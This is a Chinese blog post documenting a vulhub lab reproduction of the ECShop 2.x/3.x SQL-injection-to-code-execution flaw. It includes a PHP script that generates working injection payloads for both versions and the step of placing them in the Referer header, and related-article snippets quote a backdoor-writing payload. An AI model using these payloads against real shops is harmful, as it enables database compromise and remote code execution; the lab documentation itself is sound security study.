ECShop 2.x/3.x SQL注入/任意代码执行漏洞

最新推荐文章于 2023-04-09 18:50:35 发布
最新推荐文章于 2023-04-09 18:50:35 发布
阅读量422 收藏 1
点赞数
分类专栏: vulhub漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/117409249
版权

ECShop SQL注入 漏洞复现 代码执行 安全修复
关键词由CSDN通过智能技术生成

漏洞背景

ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。
其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。

漏洞复现

我这里用的是vulhub的环境,访问http://your-ip:8080将看到2.7.3的安装页面,访问http://your-ip:8081将看到3.6.0的安装页面。
它教程里面提供了一个脚本,能够自动生成这两个版本的Poc

<?php
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$arr = [
    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    "id" => $id
];

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";

在这里插入图片描述
到登录界面抓个包,将刚刚生成的Poc放到Referer里面
2.x运行结果:
在这里插入图片描述
3.x运行结果:
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ecshop2.7.3[已打2.7.3漏洞补丁].ra
04-02
从官方下载源码包,也已经修复了最新的漏洞
ECShop_V2.6.2_UTF8_Release0326.zip
02-04
然而,这个版本存在一些重要的安全问题,特别是关于"ecshop2.2 ecshop2.x代码执行漏洞"的标签所提及的,这是一个对系统安全性构成威胁的重要知识点。 1. **代码执行漏洞**:在ECShop V2.6.2中,存在代码执行漏洞,...
ECShop 2.x/3.x SQL注入/远程代码执行漏洞
最新发布
SwBack的博客
04-09 1414
ecshop 漏洞主要是因为 user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行.不需要登录即可远程写入webshell。
20 - vulhub - ECShop 2.x/3.x SQL注入/任意代码执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-15 1167
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3版本与3.6.0次新版本进行漏洞复现。 其实该漏洞复现的意义不是很大,现在都 7.x 8.x 版本了,但是不失为 `了解程序员写bug` 的一种另类方式。
ecshop 2.x/3.x sql注入/任意代码执行漏洞
whatday的专栏
07-01 2087
影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了任意代码执行。 值得一提的是攻击者利用的payload只适用于ECShop 2.x版本导致有部分安全分析者认为该漏洞不影响ECShop 3.x,这个是因为在3.x的版本里有引入防注...
BaizeSec#bylibrary#ecshop2.x_命令执行1
07-25
代码执行在网站根目录下生成1.php的一句话。
韵达快递Ecshop2.7.X插件
10-10
《韵达快递 Ecshop2.7.X 插件详解及应用》 在电子商务领域,物流配送是至关重要的一环,而Ecshop是一款广受欢迎的开源电商系统,为商家提供了丰富的功能和便捷的操作。针对这一系统,开发者们纷纷推出了各种与之...
transport.js文件(解决ecshop jquery jqzoom冲突)
04-02
transport.js文件(解决ecshop jquery jqzoom冲突)
ecshop商务平台兼容PHP5.6.X的完整安装包
11-23
由于自PHP5.4以后发布的版本去掉了部分原有的旧函数,导致 EcShop2.7.3 电子商务平台在 PHP5.4.X 以上安装失败。这里提供了专门针对PHP5.4.x以后版本的完整安装包,直接安装,一键成功。
ecshop常见漏洞
10-30
ecshop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库;跨站攻击; ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞ecshop的后台编辑文件/admin/affiliate_ck.php中,对输入参数auid未进行正确类型转义,导致整型注入的发生;ecshop的后台编辑文件/admin/shophelp.php中 shopinfo.php ,对输入参数$_POST['id']未进行正确类型转义,导致整型注入的发生;ecshop的/admin/comment_manage.php中,对输入参数sort_by、sort_order未进行严格过滤,导致SQL注入ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库; ECSHOP支付插件存在SQL注入漏洞,此漏洞存在于/includes/modules/payment/alipay.php文件中,该文件是ECshop的支付宝插件。由于ECShop使用了str_replace函数做字符串替换,黑客可绕过单引号限制构造SQL注入语句。只要开启支付宝支付插件就能利用该漏洞获取网站数据,且不需要注册登入;ecshop的/includes/lib_insert.php文件中,对输入参数未进行正确类型转义,导致整型注入的发生。
php运行ecshop,ecshop2.x代码执行
weixin_39935777的博客
03-26 189
前言问题发生在user.php的display函数,模版变量可控,导致注入,配合注入可达到远程代码执行漏洞分析0x01-SQL注入先看user.php$back_act变量来源于HTTP_REFERER,我们可控。assign函数用于在模版变量里赋值再看display函数读取user_passport.dwt模版文件内容,显示解析变量后的html内容,用_echash做分割,得到$k然后交给isn...
ECShop 2.x/3.x SQL注入/任意代码执行漏洞复现
weixin_51387754的博客
11-15 336
漏洞原理 ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞 ,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。 影响版本 ECShop 2.x ECShop 3.x 漏洞复现 (root????guiltyfet)-[/home/guiltyfet/vulhub/ecshop/xianzhi-2017-02-82239600] └─# docker-compos
Ecshop 2.x/3.x SQL注入/任意代码执行漏洞
Baidu_Secrity的博客
09-07 655
近日,Ecshop爆出全版本SQL注入任意代码执行漏洞,受影响的版本有:Ecshop 2.xEcshop 3.x-3.6.0该漏洞产生的根本原因在于Ecshop系统的user.php文...
ecshop flow.php 注入,ECSHOP语言项库注入漏洞分析和修复
weixin_35203997的博客
03-11 126
1.ECSHOP语言库注入漏洞利用1) 登陆到ecshop台后,选择模板管理,语言项编辑,搜索“用户信息”为什么要搜索“用户信息”,还可以搜索其它的吗?答案是搜索languages\zh_cn\user.php文件里任何一个变量都可以2) 添加如下后门,将用户信息改为用户信息${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decod...
ECSHOP v2.7.3注入漏洞分析和修复
weixin_34334744的博客
04-13 1225
测试版本 漏洞条件 漏洞利用 产生原因 修复方案 1.测试版本 v2.7.3 RELEASE 20121106(最新) v2.7.3 RELEASE 20120411 2.漏洞条件 需登录到后台 3.漏洞利用 1) 登陆到台后,选择模板管理,语言项编辑,搜索“用户信息” 为什么要搜索“用户信息”,还可以搜索其它的吗? 答案是搜索languages\zh_cn\u...
ecshop 解密index.php,ECShop 2.x 3.0代码执行漏洞分析
weixin_33356544的博客
03-19 245
0x00 前言ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。2.x版本跟3.0版本存在代码执行漏洞。0x01 漏洞原理ECShop 没有对 $GLOBAL[‘_SERVER’][‘HTTP_REFERER’] 变量进行验证,导致用户可以将任意代码插入的user_passport.dwt模板中,随后insert_mod根据模板内容动态执行相应的函数,用户插入恶意代码导致...
ecshop user.php怎么注入,ECSHOP 常见注入漏洞分析和修复方法
weixin_26706567的博客
03-11 530
优易软件为大家整理 一些ecshop 常见注入漏洞分析和修复方法,在对ecshop使用操作上能够得到一些便利。1.测试版本v2.7.3 RELEASE 20121106(最新)v2.7.3 RELEASE 201204112.漏洞条件需登录到后台3.漏洞利用1) 登陆到台后,选择模板管理,语言项编辑,搜索“用户信息”为什么要搜索“用户信息”,还可以搜索其它的吗?答案是搜索languages\zh_...
php%3cbr%3e的使用,ecshop v2.7.3入侵全过程
weixin_35748508的博客
03-10 652
利用的都是一些早就在乌云上爆出来的漏洞,是学校上课做的一个实验,把过程贴出来,第一次尝试写博客,大牛勿喷。1 Sql注入网站服务器ip:192.168.238.132管理员的访问网站的电脑ip:192.168.238.1攻击者ip:192.168.238.129 2) 漏洞存在于站外广告统计功能(对应管理后台的报表统计->站外投放JS),即/affiche.php页面,将from参数(...
ECSHOP模板修改与去版权教程
"ECshop是一款开源的电子商务系统,用于构建在线购物网站。此教程主要讲解如何在ECshop中进行特定的定制和修改,包括调用指定分类下的精品、新品、热销商品,以及去除网站的版权和标志信息。" ECshop是基于PHP开发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值